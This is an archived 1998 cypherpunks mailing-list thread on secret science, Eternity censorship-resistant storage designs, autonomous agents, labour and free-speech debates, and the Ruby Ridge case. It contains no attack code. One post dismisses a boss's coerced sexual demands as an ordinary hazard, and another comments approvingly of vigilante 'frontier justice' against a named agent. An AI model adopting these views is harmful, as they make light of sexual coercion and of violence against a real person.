>I mentioned the Manhattan Project scientists. (Choate made some bizarre
>claim after this mention that all of the science was known in the 20 and
>30s, and that no actual science was done by MP "engineers" and
>"technicians." Might be a surprise to Ulam, Teller, von Neumann, and all
>the others who worked in secrecy on the atom bomb, then the hydrogen bomb,
>and so on.)

it was science that was of borderline benefit to humanity, which was
exactly my initial point. how much has the atom bomb served humanity?
perhaps such abominations of technology require secrecy, no?

>The point being that open publication is only a part of the methodology of
>doing science, and a fairly recent one, too.

no, it has been considered the key ingredient of modern science since its
inception. concepts of publication and
proper attribution for example have been around for centuries.

>--Tim May and his Tentacles

call me a sentimental fool but just love it when they 
waggle suggestively like that!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 04:29:28 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: autonomous agents (fwd)
Message-ID: <199801122044.OAA22802@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 12 Jan 1998 19:25:53 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: autonomous agents

> A canonical way to do implement things like remailers, eternity
> servers etc. is to build a distributed computation system to allow
> autonomous agents to be distributed across the internet.  Create a
> market for CPU resources, bandwidth and disk-space so that the agent
> can pay it's way.  Charge per CPU/hour, Mbit comms at given data rates
> and Mbyte/year storage, base it on Java as a portable network based
> language with code distribution support.  Then let people fire off
> what ever they like, so long as they are paying.

Has anyone done any work that you are aware of under the Plan 9 os? With
it's fundamental seperation of i/o, process, and file servers along with
it's inherent bidding/scheduling mechanism it seems to me that a lot of this
work has already been done. In addition there are programs that allow Linux
boxes to participate as Plan 9 compliant file servers.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 13 Jan 1998 06:59:04 +0800
To: Blanc <blancw@cnw.com>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <3.0.32.19980110200421.007049d8@cnw.com>
Message-ID: <199801122254.OAA29857@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



bw does a good job of separating out a few memes for discussion;

>Initially your argument had to do with secrecy and the need for scientists
>to publish their work so that the scientific community may benefit from it.

I was not talking so much about a need, but a duty as a scientist. I
was talking about other *duties* of responsible scientists. it is 
interesting that physicians have a Hippocratic oath, but do scientists
have an oath? there are informal ideas and taboos that circulate
I think should be codified. I suggest some that involve secrecy
and the use of moral principles in the pursuit of science.

something most anarchists here will deny is the existence of something
that could be called *immoral science*. is there such a thing? I find
it trivial to see that there is. but perhaps someone that is opposed
to morality, or is a moral relativist, or has a muddled mind, or
whatever, will reject anything that uses the word "moral". in fact
you might even start a flamewar among such people for using such
a word like a red flag in front of a bull, a deliciously juicy
and delectable flamewar at that!!

>But you also said that "a key aspect of SCIENCE is publishing".    I was
>only pointing out that, in the context of those who are working for their
>own purposes and not under the employment of a government agency, some
>scientists are not overly concerned about contributing to this advancement,
>as can be observed by their reluctance to publish (even if they eventually
>do, "under the extreme pressure of friends", for instance).

absolutely, and perhaps this secrecy is a useful atmosphere for 
abominations to flourish. has anyone asked why it is that people
in our war factories (and they are vast, make no mistake) make
weapons merely because they are *feasible*?? who is it that
uses such a feeble, dark, deluded worldview to navigate the world?
answer: many thousands of people being paid handsome salaries by
your tax money extracted every week from your paycheck. many people
who consider themselves the elite intellectuals of humanity. many
people who have made an art of making themselves unaccountable to
government oversight with the easy help of  the indifferent, lazy,
and apathetic masses.

>It may be your conclusion that the advancement of science depends upon
>scientists publishing their works, but the fact is that some great
>scientists, and many others as well, are not as motivated to contribute as
>you think is proper for a "true scientist".

it is not my own conclusion. it is a simple truth that would be considered
obvious by most scientific authorities.

>I think you should distinguish between those scientistis who have joined
>some kind of "scientific community" and have established an obligation to
>share the results of their work with that group, and those scientists who
>are what they are, and do what they do, from motivations unrelated to such
>communities.

fair enough. those scientists that are being paid with taxpayer money.
and they are littered all over secret government agencies, sucking
up money like black vacuums, while they create irrelevant,
distracting diversions and decoys for the population to wail about
such as welfare, social security, etc.  perhaps there might be enough
money to go around if so much of it wasn't being encased in the
steel frames of the most technological weaponry-- killing
technology far more efficient than the ovens of Auschvitz-- ever in existence.
now being perfected with the help of your paycheck taxes..... gosh,
why would anyone care about any of this? to all the newbies on this
list-- I warn you-- the rumors are all true, I really AM INSANE!!
BWAHAHAHHAHAHA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 04:47:27 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Talk of Banning Research into Human Cloning (fwd)
Message-ID: <199801122111.PAA22985@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 12 Jan 1998 12:32:18 -0800
> From: Tim May <tcmay@got.net>
> Subject: Talk of Banning Research into Human Cloning

> (If anyone can think of other "bans on research," besides weapons areas,
> let me know.)

Class 1 drugs.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Mon, 12 Jan 1998 15:36:21 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <4qm4ie46w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.93.980112161554.346B-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 10 Jan 1998, Dr.Dimitri Vulis KOTM wrote:

> ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au> writes:

> > Since when has a crypto anarchist been a market anarchist?
> 
> You can't realy be one without the other. You can't be a little bit statist.
> You can't be a little bit pregnant.

A person can be more statist then another person.  Statistness is a
real not a binarie.  

[...]

> > Ok a for instence,  if I was your boss and I sated that I would fire you
> > unless you would go *u-hum* cave exploring with me[1].  Such situations
> > have occured in the past, would you support them.
> 
> If the sole owner of a business has a female secretary brought into his
> office, pulls down his pants, and orders her to kiss his dick; and fires her
> for refusing; then he's engaging in behavior that's been viewed for centuries
> as one of the occupational hazards for working women and nothing out of the
> ordinary.

And if a mine worker suffercates to death in a poorly venterlated mine
then there engaging in behavior that's been viewed for centuries as one of
the occupation hazards for workers in poorly venterlated mines.

But of cause we have occupational health and safty laws to stop these
types of abuse.

[...]

> Wouldn't it be easier to say that if you don't
> like your present job for any reason (including your boss making amorous
> advances, or too little pay, or the color of the paint on the walls of your
> office), you should look for another one?

Which is fine when the ecomomy is strong and there is pleanty of jobs
going around but when the economy is on a downturn (like say because your
magour export markets have gone into free falls) and there are few jobs,
cound you risk it.

[...]

> > To me a person with that amount of power is uneceptable.
> 
> You'd rather give his power to the employee or to the state?

I'd rather have power spread around so no one has a signifigent amount of
it.

[...]

> Would you have preferred the model popular in the medieval europe, where
> the boss was forced to care for the worker (peasant) if he got too old/sick to
> work,

In a way we do this via our super anuation scheams.

[...]

> Apparently that involved the boss's right to fuck the peasant and
> his family any time he pleased (ever heard of droit de segnor?)

Its a type of dog isn't it?  A big hairy one. [2]

[...]

> > Immagion there is a truck rolling out of conrol in your direction,
> > keeping silent may harm you by preventing you from jumping out of the way,
> > but this is not an agressive act, it is a passive one: I have declined to
> > warn you.
> 
> The inaction that you've described is highly unethical, but hardly illegal.

Depeaning on the laws and cercomstances you may get procuted in simmler
situtaions.  Indeed the coronor is going to have allot of questions to
ask you.

[2] Lit Right of the first night.  The boss had the right to fuck your
wife on the first night of your marrige.  The only refereces we have for
this are the laws out-lawing the practice.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNLmtaqQK0ynCmdStAQFD1QP9G3eOW5vyRVzkS9zQ1ImK92/P+aTHt1a9
MeqaNPOL/6Mt90X0bjfVWEm6PdgfGCxAvo+d79DW5l1GzHAOvwaAa7JBK2FsfTi/
1AAaEXe4O2nxYymaL5xHz+BiUO6ew5T2HetxvcacJn5EF8OZViROa3LHXbPGy6Mz
BLtpjldRWTE=
=t8GV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Date: Tue, 13 Jan 1998 01:08:29 +0800
To: cypherpunks@cyberpass.net
Subject: Service denial attacks on Eternity
Message-ID: <E0xrn57-0006Ja-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> It is also likely in the extreme that a working Eternity service will
> quickly be hit with attackers of various sorts who want to test the limits
> of the service, or who want such services shut down.

Exactly. When I first talked about Eternity, which was at either the
1994 or 1995 protocols workshop, I was walking back to my seat when
Bob Morris (then at the NSA) said, from behind his hand in a stage
whisper, `Kiddyporn!'

Adam Back added:

> the spooks / feds have a history of posting their own child porn if
> none is available to seize

Indeed, and a decade or so ago there was a scandal when it turned out
that the spooks were using the Kincora Boys' Home in Belfast as a pedo
brothel in order to entrap various local politicians. For them to say
now that they need key escrow to suppress Kiddyporn is a bit rich!

However the main threat is the court order - Anton Pillar or whatever
- and the best weapon against court orders is anonymity. If they don't
know your address they can't serve you the order or arrest you for
contempt.

Tom Womack:

> I can imagine *use* of the service becoming a felony

I mentioned in the paper that Mossad might deny Eternity service to
the Muslim world by posting something rude about the Prophet Mohammed.

One must of course create a lawful excuse for people to have Eternity
software mounted on their system. Maybe in addition to the `public'
Eternity service we should have many corporate or even private
services, many of which have escrow capabilities and are thus clearly
law-abiding and accountable :-)

There are many other possibilities. One topic that oozes into my
consciousness from time to time is that one might integrate covert
communications and storage with an anti-spam mail program - maybe a
natural way forward if Adam hides Eternity traffic in spam!

Tim again:

> Great idea, but where are the customers?

Some 90% of security research effort is on confidentiality, 9% on
authenticity and 1% on availability. Corporate infosec expenditures
are exactly the other way round, and tools to enable disaster recovery
databases to be spread holographically over a company's PCs could save
a fortune compared with the cost of some current arrangements. If a
few of these backup resources have hidden directories that mount the
public Eternity service, then who can tell?

At the Info Hiding Workshop at Portland in April, I will present a new
idea which may facilitate such implementations of Eternity. This is
the Steganographic File System - designed to provide you with any file
whose name and password you know. If you don't know this combination,
then you can't even tell that the file is there. We do not need to
make any assumptions about tamper resistance; it can be done using
suitable mathematics. (This is joint work with Roger Needham and Adi
Shamir.)

Ross

PS: we need a better word for `eternityspace', and Bell Labs have
already trademarked `Inferno'. So what - Nirvana? Valhalla?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 06:45:10 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Freedom Forum report on the State of the First Amendment (fwd)
Message-ID: <199801122311.RAA23502@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 11 Jan 1998 16:40:11 -0400
> From: The Sheriff <sheriff@speakeasy.org>
> Subject: Re: Freedom Forum report on the State of the First Amendment

> Sam Adams (as it may or may not have been mentioned on this list)
> himself had a problem with our constitution -- he didn't think that
> it was right for the people to ratify the bill of rights, thereby
> protecting certain rights under the constitution.  Why?  Simple.
> 
> He was of the mind that setting our rights, such as the right to
> free speech, in concrete meant that anything NOT set in concrete
> wasn't a right -- he felt that by ratifying the bill of rights,
> rather than using logic as I did above, we were actually LIMITING
> our rights as freely roaming human beings.

Which is the reason they put the 9th and 10th in there.

> America should be about not taking any shit from anybody -- not
> because you can sue, but because you have enough attitude to realize
> when the other guy's being an idiot, and because you have enough
> balls to tell him so.

Actualy it should be because people realize you don't owe that other person
an explanation for your actions and you further don't need their permission.
Of course this assumes you *aren't* using anything that belongs to them.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 07:18:05 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Future War on TDC this Sunday
Message-ID: <199801122344.RAA23793@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Just saw an add for Future War on The Discovery Channel this Sunday evening.
It is supposed to discuss the impact of global television as the primary
weapon in the warfare of tomorrow.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 07:38:39 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Global market going to the bears?   [CNN]
Message-ID: <199801130004.SAA23988@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    Managers worldwide say they are losing confidence in equities, buying
>    bonds
>    
>    January 12, 1998: 1:48 p.m. ET
>    
>    Mutual Funds Guide
>    More related sites... LONDON (Reuters) - Fund managers worldwide are
>    increasingly pessimistic about economic and corporate earnings growth,
>    according to investment bank Merrill Lynch's monthly Gallup Global
>    Survey released on Monday.
>    [INLINE] "Managers are downgrading their forecasts for earnings per
>    share and at the same time this bearishness for equities makes them
>    want to buy bonds," Merrill Lynch global strategist Bijal Shah told
>    Reuters Financial Television. "They are saying this weakness in
>    activity means that inflation is not going to pick up and bond prices
>    should rise."

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 07:39:16 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Sun to fight MS w/ new workstations [CNN]
Message-ID: <199801130006.SAA24034@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    New Unix workstations, lower pricing seen as bulwark against Microsoft
>    NT
>    
>    January 12, 1998: 1:11 p.m. ET
>    
>    Java goes to set-top boxes - Jan. 9, 1998
>    
>    Sun cross-pollinates Intel - Dec. 16, 1998
>    
>    More related sites... PALO ALTO, Calif.(Reuters) - Sun Microsystems
>    Inc. will launch a new line of workstations Tuesday, aiming to
>    challenge its rivals and blunt the spread into markets for
>    high-powered desktop computers used by engineers of PCs using
>    Microsoft Corp.'s Windows NT.
>    [INLINE] The new workstations are the result of a two-year effort by
>    Sun to design products that greatly reduce the cost of the computers
>    used by power-hungry engineers, while still providing the blistering
>    performance they demand.
>    [INLINE] "This is really big. We think we can create an alternative to
>    [PCs running] NT," Ed Zander, president of Sun Microsystems Computer
>    Co., the company's largest division, said in an interview with Reuters
>    ahead of the announcement.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Tue, 13 Jan 1998 11:14:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: rant on the morality of confidentiality
Message-ID: <3.0.32.19980112191309.0069b3d8@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



 Mad Vlad wants to know:

>something most anarchists here will deny is the existence of something
>that could be called *immoral science*. is there such a thing? 
............................................................

No.  There are, however, immoral scientists.   One way to skew the
interpretations of what you write, besides bringing up the subject of
morality, is to describe things in ways which do not correspond to their
actual manner of existence:  "science" does not exist without those
individuals who have set themselves to pursue it.  They should bear the
blame if they practice it immorally.

You again have brought up several issues which can be examined separately
and do not necessarily coexist:

.  being a scientist
.  pretending to be scientific
.  choosing to pursue science
.  being smart enough to pursue scientific research
.  being successful in the scientific pursuit of truths
.  giving a damn about the consequences of the effects of research as it
affects humanity or other living things (as when it is imposed upon them)
.  responsibility in science
.  responsibility in science as practiced by mendicants of the State
.  the regulation of responsibility per se
.  the regulation of the methods of science
.  the support of irresponsible scientific methods, by slaves of the State
.  anarchist cypherpunkery

I become exceedingly uncomfortable at the realization that I have to buy an
astronomy magazine from the store, paying yet again for info, in order to
find out some of what they're doing at NASA.   To think that a responsible
citizen like myself must go out searching for the info themselves, using
whatever resources they can find or pay for, in order to become informed!
There are all sorts of things that government employees do not "share" with
those who pay the bills.

There is a book in Objectivist literature which presents the idea of
"context dropping", which is, that in order for some people to function as
if things were normal and that what they're doing is consistent with moral
principles, they must drop a part of their information out of sight, out of
thought, so that their actions appear logically related and make sense  -
they eliminate elements from the given context, crucial essentials which
make the difference in its character.  People like these might practice
secrecy in keeping information from others, but equally significant, they
also hide things from themselves.

So that's one thing which would explain some scientist's lack of moral
principles in the pursuit of science.   Then it must be explained why so
many people aren't complaining about it.  Are they insensitive to their
mistreatment, sitting ducks for opportunists?  Or maybe these taxpayers are
equally immoral, thinking only about promised benefits, forgetting about
the disadvantage of losing control over the quality of their life?

It's possible for some people to override the boundaries of decency, even
if they're otherwise smart enough to pursue science.  But what would you
expect cryptographers to do about it?


    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 13 Jan 1998 04:21:48 +0800
To: eternity@internexus.net
Subject: autonomous agents
Message-ID: <199801121925.TAA00539@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




A canonical way to do implement things like remailers, eternity
servers etc. is to build a distributed computation system to allow
autonomous agents to be distributed across the internet.  Create a
market for CPU resources, bandwidth and disk-space so that the agent
can pay it's way.  Charge per CPU/hour, Mbit comms at given data rates
and Mbyte/year storage, base it on Java as a portable network based
language with code distribution support.  Then let people fire off
what ever they like, so long as they are paying.

In this environment an eternity variant, or remailers, or anything
else becomes a collection of autonomous agents which must fund their
own distribution.  The autonomous agents could send back profits to
their creators, or use the profits to self propagate.

Someone who thought up a good application, and got the economics right
for their bot's buy and sell algorithms might become rich, even.

I had considered that a generic perl execution system charging for
resources would be useful for remailers a few years back.  Java seems
pretty good for this purpose also, being another portable network
aware language.

>From what Ryan has said his design uses markets for resources also.


The question is though would you let a bot of this sort loose on your
system?

For agents to be able to achieve anything useful, the Java sandbox
model has to be relaxed to allow the agent to make network connections
to other than the machine the code was served from.  Java has support
for this in that signed applications are allowed to make external
network connections.

The problem is the flexibility would allow an autonomous agent to pay
it's way in say breaking into a series of machines, and sending back
obtained documents via remailer to the operator.  A well funded
attacker could cause lots of problems for operators.

However the system as a whole is nice for our `creating lawful
excuses' drive, because there are many applications which could make
good use of the distributed computation system: filmatic quality image
rendering computations, scientific computations, code breaking
efforts, distributed web server applications. 


The liability questions are interesting also.  If the participant in
the CPU resource market is not expected to be able to vet all source
code he runs, this gives the would be eternity operator a chance to
distribute his risk.  If the system becomes widely used, this helps
protect it from attack.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 09:05:55 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: USPS loosing business to email  [CNN]
Message-ID: <199801130133.TAA24345@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                U.S. POSTAL SERVICE LOSING BUSINESS TO COMPUTERS
>                                        
>      e-mail vs. snail mail January 12, 1998
>      Web posted at: 3:25 p.m. EST (2025 GMT)
>      
>      NEW YORK (CNN) -- The U.S. Postal Service is facing stiff
>      competition from computers, according to an article in the January
>      19 issue of Time Magazine.
>      
>      Electronic mail could replace 25 percent of conventional mail, or
>      "snail mail," by the year 2000, the article said.
>      
>      The Postal Service lags behind Federal Express and United Parcel
>      Service in shipping packages. The latter already moves 80 percent of
>      the country's packages, according to the article.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 13 Jan 1998 11:37:47 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: steganography and delayed release of keys (Re: EternityServices)
In-Reply-To: <v03102801b0df03d95cd4@[207.167.93.63]>
Message-ID: <v03102803b0e08ed02241@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:46 PM -0800 1/12/98, Adam Back wrote:

>One tactic which could protect a USENET newsgroup operator from child
>porn prosecutions is if he had no practical way to recognize such
>materials until after it was distributed to down stream sites.

Who are these "USENET newsgroup operators," anyway? (A few newsgroups are
moderated, by individuals or committees, but the vast majority are not.)

Newsgroups get removed from university and corporate newsfeeds, or by
nations, and Adam's ruse would not stop them from continuing to do so.


>> >The solution I am using is to keep reposting articles via remailers.
>> >Have agents which you pay to repost.  This presents the illusion of
>>
>> This of course doesn't scale at all well. It is semi-OK for a tiny, sparse
>> set of reposted items, but fails utterly for larger database sets. (If and
>> when Adam's reposted volumes begin to get significant, he will be viewed as
>> a spammer. :-) )
>
>The best criticism of my eternity design to date!  I agree.

I assume you are serious, and do agree, as it is a very solid criticism of
the "Eternity as continuous posting to Usenet" model.

I see several axes to the analysis of the various Eternity schemes.

-- retrieval time for a customer or client to obtain some set of data,
ranging from (I assume) ~minutes or less in an Eternity DDS file system to
~days or less in a Blacknet system to (I am guessing) ~weeks or months in
an Adam Back sort of system.

(Given constraints on Usenet in existence today. Technological and
political constraints in how many gigabytes will be sent. The binaries
groups are already overloading many systems, of course.)

-- bandwidth consumed in the system

-- number of nodes

-- security

(I have my own biases, and will elaborate when I get some time to put my
thoughts together.)


--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 13 Jan 1998 11:41:34 +0800
To: Eric Cordian <cypherpunks@cyberpass.net
Subject: Re: Feds to Idaho: Kiss Our Butts
In-Reply-To: <199801130255.UAA21084@wire.insync.net>
Message-ID: <v03102804b0e09134b1fd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:55 PM -0800 1/12/98, Eric Cordian wrote:
>The manslaughter case against Ruby Ridge shooter Lon Horiuchi was
>effectively neutered today when a federal judge acquiesed to demands
>by Justice Department lawyers and moved the case out of Idaho's
>jurisdiction and into federal court.  This means that Horiuchi will be
>tried in federal court in front of a federal jury on state
>manslaughter charges, and not in front of a jury from Idaho's Boundary
>County, where the shooting took place.
>
>This ruling, by U.S. District Judge Edward Lodge, came just six days
>after Boundary County Magistrate Quentin Harden ordered Horiuchi to
>stand trial.  State manslaughter charges had been filed against
>Horiuchi for the death of Vicki Weaver in August.
>
>The Justice Department, which has denied that Horiuchi did anything
>wrong, provided the lawyers who argued that any case in which federal
>agents are acting in their official capacity may be transferred and
>tried in federal court, in front of a federal jury.
>
>The trial is scheduled to begin March 10.  Horiochi has continued to
>work for the FBI since the charges were filed.

The militia groups have known this was a foregone conclusion from the
gitgo. This is why they are advocating frontier justice for Horiuchi.

(However, exhaustive searches for this murderer have not turned up evidence
of him. If he's "continuing to work for the FBI," it's from a safe house,
or with a new name. Probably a safe house, as no one has reported seeing
him near Federal buildings, either.)

The guy's probably dead meat anyway.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 13 Jan 1998 11:53:48 +0800
To: Adam Back <eternity@internexus.net
Subject: Re: mirroring services, web accounts for ecash
In-Reply-To: <199801130314.DAA00409@server.eternity.org>
Message-ID: <v03102805b0e09252f52e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:14 PM -0800 1/12/98, Adam Back wrote:
>Some meta-level thoughts on the eternity service document availability
>problem:
>
>Many of the problems with designing an eternity service are introduced
>by trying to build real time accessibility of data (with similar
>response times for documents to those offered by web servers).
>
>The BlackNet model can quite ably provide eternity like services with
>perhaps 24 hour turn around on documents.  Everything is operated by
>digital dead drop (via say news:alt.anonymous.messages), or mixmaster
>remailers.

Ah, I just saw this message after already sending my last message, where I
described several axes. I even cited the same estimate, of "~days," for the
latency of Blacknet sorts of Eternity implementations.

Adam and I are apparently thinking similar sorts of thoughts. A pity we
waste so much time at Cypherpunks physical meetings getting "updates" on
commercial (and boring, from an issues viewpoint) crypto products when some
exciting seminars and brainstormings on these sorts of issues would be so
much more fun.

(Note: I shouldn't be criticizing Cypherpunks physical meetings too much. I
suppose they serve a purpose, and the Bay Area community has moved away
from "exotic" applications and ideas to more commercial issues. And why I
basically don't go to meetings much anymore.)

Back to Back:

>This suggests that another approach would be to have two classes of
>services.  Users of high risk documents can put up with 24 hour turn
>around, and lower risk documents can be served by an alternate
>service, intermediate risk documents can exist by using low risk
>resources until detection.

Here's a meta-question: Suppose one holds highly secret or sensitive data,
for which one wants to use an Eternity service to ensure the information is
not suppressed by some government or other actor.

Why centralize the data at all?

Why not just use the "pointer" to the data and offer to provide it?

Which is what Blacknet was all about. Instead of focussing on a data base,
focus instead on an untraceable market mechanism.

(I admit that a system which can provide *A LOT* of data *VERY FAST*, and
also untraceably or unstoppably, is an attractive goal. It would blow both
Adam's "repost to Usenet" and my "Blacknet" approaches to hell and gone.
The catch is that I can't see how such a system will get built, who will
run the nodes, how payment will be made to pay for the nodes and work, and
how traffic analysis will be defeated.)

And I think implementing the slower-but-no-breakthroughs approach (Blacknet
or variations) has some advantages. It may be many years before we need to
be in the corner of the graph that is "large amounts of data--very fast
retrieval--very secure."

